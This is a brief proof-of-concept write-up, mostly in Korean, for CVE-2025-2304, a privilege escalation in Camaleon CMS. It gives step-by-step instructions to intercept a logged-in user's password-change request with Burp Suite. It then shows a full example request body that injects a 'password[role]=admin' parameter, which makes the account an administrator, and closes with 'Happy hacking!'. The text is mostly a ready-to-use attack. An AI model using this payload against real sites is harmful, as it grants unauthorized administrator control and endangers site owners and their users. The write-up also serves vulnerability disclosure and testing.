
CVE-2025-2304 POC - Camaleon CMS Privilege Escalation
CVE-2025-2304 POC - Camaleon CMS 권한 상승
이 POC는 Camaleon CMS의 권한을 관리자로 상승시키는 데 사용됩니다. 이 익스플로잇은 인증된 사용자의 비밀번호 재설정 기능에 역할을 주입하여 작동합니다.
사용자 계정으로 로그인합니다. 로그인 후 프로필 페이지로 이동하여 비밀번호 변경을 클릭합니다. Burp Suite를 사용하여 비밀번호 변경 기능을 가로챕니다.
아래 예시를 참고하여 페이로드를 편집하고 role을 추가합니다.
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin
페이로드에 %5Brole%5D=admin을 추가하면 이제 관리자가 됩니다.
페이지를 새로고침하면 이제 관리자가 됩니다.
Happy hacking!